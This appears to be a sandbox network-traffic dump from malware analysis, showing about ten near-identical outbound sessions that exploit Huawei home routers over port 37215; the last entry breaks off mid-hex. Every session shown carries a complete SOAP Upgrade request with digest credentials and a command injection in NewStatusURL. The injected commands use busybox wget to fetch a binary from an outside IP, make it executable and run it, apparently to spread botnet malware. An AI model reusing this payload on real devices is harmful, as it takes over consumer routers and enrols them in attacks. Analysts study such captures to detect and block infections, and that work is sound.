                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1989192.168.2.155886441.117.210.14837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.602755070 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1990192.168.2.155487241.141.112.2237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.602816105 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1991192.168.2.153475041.180.86.25237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.602819920 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1992192.168.2.155584441.253.152.23137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.602938890 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1993192.168.2.153916041.233.76.22937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.602948904 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1994192.168.2.154731041.91.111.8137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.602968931 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1995192.168.2.155382641.171.65.23337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.603004932 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1996192.168.2.155833241.41.253.13537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.603012085 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1997192.168.2.153911041.143.143.5737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.603142977 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1998192.168.2.155780841.144.232.6137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.604068041 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 